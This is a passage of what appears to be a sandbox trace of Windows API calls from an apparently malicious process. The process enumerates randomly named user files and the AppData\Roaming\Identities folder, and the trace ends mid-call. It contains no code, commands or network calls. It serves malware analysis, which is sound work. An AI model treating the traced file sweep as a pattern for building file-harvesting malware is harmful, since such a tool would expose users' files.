ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x5e72fb50, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5e72fb50, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb3e8 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2cf0f0 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fe0 | out: hHeap=0x2b0000) returned 1 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a0) returned 0x2ed6d8 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.134] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x5e72fb50, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5e72fb50, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.134] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8d6550, ftCreationTime.dwHighDateTime=0x1d75935, ftLastAccessTime.dwLowDateTime=0x748b5370, ftLastAccessTime.dwHighDateTime=0x1d75c61, ftLastWriteTime.dwLowDateTime=0x748b5370, ftLastWriteTime.dwHighDateTime=0x1d75c61, nFileSizeHigh=0x0, nFileSizeLow=0x185e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Q4eQJS1fRFHDf4LHgo.odt", cAlternateFileName="0Q4EQJ~1.ODT")) returned 1 [0220.134] GetProcessHeap () returned 0x2b0000 [0220.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17) returned 0x2cefd0 [0220.135] GetProcessHeap () returned 0x2b0000 [0220.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.135] GetProcessHeap () returned 0x2b0000 [0220.135] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.135] GetProcessHeap () returned 0x2b0000 [0220.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.135] GetProcessHeap () returned 0x2b0000 [0220.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.135] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd78de20, ftCreationTime.dwHighDateTime=0x1d74e86, ftLastAccessTime.dwLowDateTime=0xac208300, ftLastAccessTime.dwHighDateTime=0x1d75306, ftLastWriteTime.dwLowDateTime=0xac208300, ftLastWriteTime.dwHighDateTime=0x1d75306, nFileSizeHigh=0x0, nFileSizeLow=0x18a91, dwReserved0=0x0, dwReserved1=0x0, cFileName="31wG DCrr 3WhY.png", cAlternateFileName="31WGDC~1.PNG")) returned 1 [0220.135] GetProcessHeap () returned 0x2b0000 [0220.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cefd0 [0220.136] GetProcessHeap () returned 0x2b0000 [0220.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.136] GetProcessHeap () returned 0x2b0000 [0220.136] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.136] GetProcessHeap () returned 0x2b0000 [0220.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.136] GetProcessHeap () returned 0x2b0000 [0220.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.136] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x868b1760, ftCreationTime.dwHighDateTime=0x1d7518d, ftLastAccessTime.dwLowDateTime=0xf9a218d0, ftLastAccessTime.dwHighDateTime=0x1d754b6, ftLastWriteTime.dwLowDateTime=0xf9a218d0, ftLastWriteTime.dwHighDateTime=0x1d754b6, nFileSizeHigh=0x0, nFileSizeLow=0xe1cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hxA8MDk1jBSUP5Fu.mp4", cAlternateFileName="5HXA8M~1.MP4")) returned 1 [0220.137] GetProcessHeap () returned 0x2b0000 [0220.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2cefd0 [0220.137] GetProcessHeap () returned 0x2b0000 [0220.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.137] GetProcessHeap () returned 0x2b0000 [0220.137] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.137] GetProcessHeap () returned 0x2b0000 [0220.137] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.138] GetProcessHeap () returned 0x2b0000 [0220.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.138] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52aa1710, ftCreationTime.dwHighDateTime=0x1d75030, ftLastAccessTime.dwLowDateTime=0x11dc0cb0, ftLastAccessTime.dwHighDateTime=0x1d75c4d, ftLastWriteTime.dwLowDateTime=0x11dc0cb0, ftLastWriteTime.dwHighDateTime=0x1d75c4d, nFileSizeHigh=0x0, nFileSizeLow=0x155b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="7-h91TW7dfUZ.flv", cAlternateFileName="7-H91T~1.FLV")) returned 1 [0220.138] GetProcessHeap () returned 0x2b0000 [0220.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f5238 [0220.138] GetProcessHeap () returned 0x2b0000 [0220.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.139] GetProcessHeap () returned 0x2b0000 [0220.139] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.139] GetProcessHeap () returned 0x2b0000 [0220.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.139] GetProcessHeap () returned 0x2b0000 [0220.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.139] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851b1b50, ftCreationTime.dwHighDateTime=0x1d74fda, ftLastAccessTime.dwLowDateTime=0xd18cbad0, ftLastAccessTime.dwHighDateTime=0x1d75637, ftLastWriteTime.dwLowDateTime=0xd18cbad0, ftLastWriteTime.dwHighDateTime=0x1d75637, nFileSizeHigh=0x0, nFileSizeLow=0xca3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="8NK_Z-2XS5.wav", cAlternateFileName="8NK_Z-~1.WAV")) returned 1 [0220.139] GetProcessHeap () returned 0x2b0000 [0220.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f5238 [0220.140] GetProcessHeap () returned 0x2b0000 [0220.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.140] GetProcessHeap () returned 0x2b0000 [0220.140] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.141] GetProcessHeap () returned 0x2b0000 [0220.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.141] GetProcessHeap () returned 0x2b0000 [0220.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.141] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ee690, ftCreationTime.dwHighDateTime=0x1d75402, ftLastAccessTime.dwLowDateTime=0x60a556c0, ftLastAccessTime.dwHighDateTime=0x1d75c26, ftLastWriteTime.dwLowDateTime=0x60a556c0, ftLastWriteTime.dwHighDateTime=0x1d75c26, nFileSizeHigh=0x0, nFileSizeLow=0x819c, dwReserved0=0x0, dwReserved1=0x0, cFileName="aP5U dXrOW3LE.mkv", cAlternateFileName="AP5UDX~1.MKV")) returned 1 [0220.141] GetProcessHeap () returned 0x2b0000 [0220.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11) returned 0x2cefd0 [0220.141] GetProcessHeap () returned 0x2b0000 [0220.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.142] GetProcessHeap () returned 0x2b0000 [0220.142] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.142] GetProcessHeap () returned 0x2b0000 [0220.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.142] GetProcessHeap () returned 0x2b0000 [0220.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.142] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x320c6f00, ftCreationTime.dwHighDateTime=0x1d75178, ftLastAccessTime.dwLowDateTime=0x42a8c1d0, ftLastAccessTime.dwHighDateTime=0x1d75a6d, ftLastWriteTime.dwLowDateTime=0x42a8c1d0, ftLastWriteTime.dwHighDateTime=0x1d75a6d, nFileSizeHigh=0x0, nFileSizeLow=0x6f53, dwReserved0=0x0, dwReserved1=0x0, cFileName="CwtxQ2_uZEnUB9bS7pu.rtf", cAlternateFileName="CWTXQ2~1.RTF")) returned 1 [0220.142] GetProcessHeap () returned 0x2b0000 [0220.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17) returned 0x2cefd0 [0220.143] GetProcessHeap () returned 0x2b0000 [0220.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.143] GetProcessHeap () returned 0x2b0000 [0220.143] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.143] GetProcessHeap () returned 0x2b0000 [0220.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.143] GetProcessHeap () returned 0x2b0000 [0220.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.144] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50ce2200, ftCreationTime.dwHighDateTime=0x1d7548c, ftLastAccessTime.dwLowDateTime=0x3cdbbe80, ftLastAccessTime.dwHighDateTime=0x1d7590d, ftLastWriteTime.dwLowDateTime=0x3cdbbe80, ftLastWriteTime.dwHighDateTime=0x1d7590d, nFileSizeHigh=0x0, nFileSizeLow=0xe29a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cx1Y M.wav", cAlternateFileName="CX1YM~1.WAV")) returned 1 [0220.144] GetProcessHeap () returned 0x2b0000 [0220.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f5238 [0220.144] GetProcessHeap () returned 0x2b0000 [0220.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.144] GetProcessHeap () returned 0x2b0000 [0220.144] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.145] GetProcessHeap () returned 0x2b0000 [0220.145] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.145] GetProcessHeap () returned 0x2b0000 [0220.145] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.145] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ced3710, ftCreationTime.dwHighDateTime=0x1d757c2, ftLastAccessTime.dwLowDateTime=0xb42416e0, ftLastAccessTime.dwHighDateTime=0x1d757ff, ftLastWriteTime.dwLowDateTime=0xb42416e0, ftLastWriteTime.dwHighDateTime=0x1d757ff, nFileSizeHigh=0x0, nFileSizeLow=0x175c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="E4DJxmd h9Befc.mp4", cAlternateFileName="E4DJXM~1.MP4")) returned 1 [0220.145] GetProcessHeap () returned 0x2b0000 [0220.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cefd0 [0220.145] GetProcessHeap () returned 0x2b0000 [0220.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.146] GetProcessHeap () returned 0x2b0000 [0220.146] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.146] GetProcessHeap () returned 0x2b0000 [0220.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.146] GetProcessHeap () returned 0x2b0000 [0220.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.146] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed4ae160, ftCreationTime.dwHighDateTime=0x1d75322, ftLastAccessTime.dwLowDateTime=0xd38602e0, ftLastAccessTime.dwHighDateTime=0x1d753ff, ftLastWriteTime.dwLowDateTime=0xd38602e0, ftLastWriteTime.dwHighDateTime=0x1d753ff, nFileSizeHigh=0x0, nFileSizeLow=0xfd7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBS5t T24mifP0.mp3", cAlternateFileName="EBS5TT~1.MP3")) returned 1 [0220.146] GetProcessHeap () returned 0x2b0000 [0220.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cefd0 [0220.146] GetProcessHeap () returned 0x2b0000 [0220.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.147] GetProcessHeap () returned 0x2b0000 [0220.147] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.147] GetProcessHeap () returned 0x2b0000 [0220.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.147] GetProcessHeap () returned 0x2b0000 [0220.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.147] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x100e9d50, ftCreationTime.dwHighDateTime=0x1d75737, ftLastAccessTime.dwLowDateTime=0x92fd5860, ftLastAccessTime.dwHighDateTime=0x1d758e9, ftLastWriteTime.dwLowDateTime=0x92fd5860, ftLastWriteTime.dwHighDateTime=0x1d758e9, nFileSizeHigh=0x0, nFileSizeLow=0x15915, dwReserved0=0x0, dwReserved1=0x0, cFileName="f3HRyhdn9kPe53k.jpg", cAlternateFileName="F3HRYH~1.JPG")) returned 1 [0220.147] GetProcessHeap () returned 0x2b0000 [0220.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2cefd0 [0220.148] GetProcessHeap () returned 0x2b0000 [0220.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.148] GetProcessHeap () returned 0x2b0000 [0220.148] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.148] GetProcessHeap () returned 0x2b0000 [0220.148] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.148] GetProcessHeap () returned 0x2b0000 [0220.148] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.148] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd017ec0, ftCreationTime.dwHighDateTime=0x1d74d89, ftLastAccessTime.dwLowDateTime=0xdbf739c0, ftLastAccessTime.dwHighDateTime=0x1d75b76, ftLastWriteTime.dwLowDateTime=0xdbf739c0, ftLastWriteTime.dwHighDateTime=0x1d75b76, nFileSizeHigh=0x0, nFileSizeLow=0x4ace, dwReserved0=0x0, dwReserved1=0x0, cFileName="GThJHR.mp3", cAlternateFileName="")) returned 1 [0220.149] GetProcessHeap () returned 0x2b0000 [0220.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f5238 [0220.149] GetProcessHeap () returned 0x2b0000 [0220.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.155] GetProcessHeap () returned 0x2b0000 [0220.155] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.155] GetProcessHeap () returned 0x2b0000 [0220.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.156] GetProcessHeap () returned 0x2b0000 [0220.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.156] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1c20850, ftCreationTime.dwHighDateTime=0x1d75c3b, ftLastAccessTime.dwLowDateTime=0x1a0eb1c0, ftLastAccessTime.dwHighDateTime=0x1d75c62, ftLastWriteTime.dwLowDateTime=0x1a0eb1c0, ftLastWriteTime.dwHighDateTime=0x1d75c62, nFileSizeHigh=0x0, nFileSizeLow=0xc31c, dwReserved0=0x0, dwReserved1=0x0, cFileName="I5SEAg.mp4", cAlternateFileName="")) returned 1 [0220.156] GetProcessHeap () returned 0x2b0000 [0220.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f5238 [0220.156] GetProcessHeap () returned 0x2b0000 [0220.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.156] GetProcessHeap () returned 0x2b0000 [0220.156] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.157] GetProcessHeap () returned 0x2b0000 [0220.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.157] GetProcessHeap () returned 0x2b0000 [0220.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.157] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0220.157] GetProcessHeap () returned 0x2b0000 [0220.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f5238 [0220.157] GetProcessHeap () returned 0x2b0000 [0220.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.158] GetProcessHeap () returned 0x2b0000 [0220.158] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.158] GetProcessHeap () returned 0x2b0000 [0220.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.158] GetProcessHeap () returned 0x2b0000 [0220.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2d) returned 0x2ec3f0 [0220.158] GetProcessHeap () returned 0x2b0000 [0220.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2d) returned 0x2ec460 [0220.158] GetProcessHeap () returned 0x2b0000 [0220.158] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x5a) returned 0x2d3e40 [0220.159] GetProcessHeap () returned 0x2b0000 [0220.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2cfc80 [0220.159] GetProcessHeap () returned 0x2b0000 [0220.159] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x34) returned 0x2eb428 [0220.159] GetProcessHeap () returned 0x2b0000 [0220.159] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb428, Size=0x68) returned 0x2f7508 [0220.159] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb428 [0220.160] GetProcessHeap () returned 0x2b0000 [0220.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2cefd0 [0220.160] GetProcessHeap () returned 0x2b0000 [0220.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f7508 | out: hHeap=0x2b0000) returned 1 [0220.160] GetProcessHeap () returned 0x2b0000 [0220.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3e40 | out: hHeap=0x2b0000) returned 1 [0220.160] GetProcessHeap () returned 0x2b0000 [0220.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.160] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.160] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0220.161] GetProcessHeap () returned 0x2b0000 [0220.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2dc458 [0220.161] GetProcessHeap () returned 0x2b0000 [0220.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2d) returned 0x2ec460 [0220.161] GetProcessHeap () returned 0x2b0000 [0220.161] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x5a) returned 0x2d3e40 [0220.161] GetProcessHeap () returned 0x2b0000 [0220.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.161] GetProcessHeap () returned 0x2b0000 [0220.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2e1620 [0220.162] GetProcessHeap () returned 0x2b0000 [0220.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2e1680 [0220.162] GetProcessHeap () returned 0x2b0000 [0220.162] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1680, Size=0xa8) returned 0x2e6040 [0220.162] GetProcessHeap () returned 0x2b0000 [0220.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ec460 [0220.162] GetProcessHeap () returned 0x2b0000 [0220.162] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x5c) returned 0x2f7508 [0220.162] GetProcessHeap () returned 0x2b0000 [0220.162] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xb8) returned 0x2f3978 [0220.162] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb468 [0220.163] GetProcessHeap () returned 0x2b0000 [0220.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, 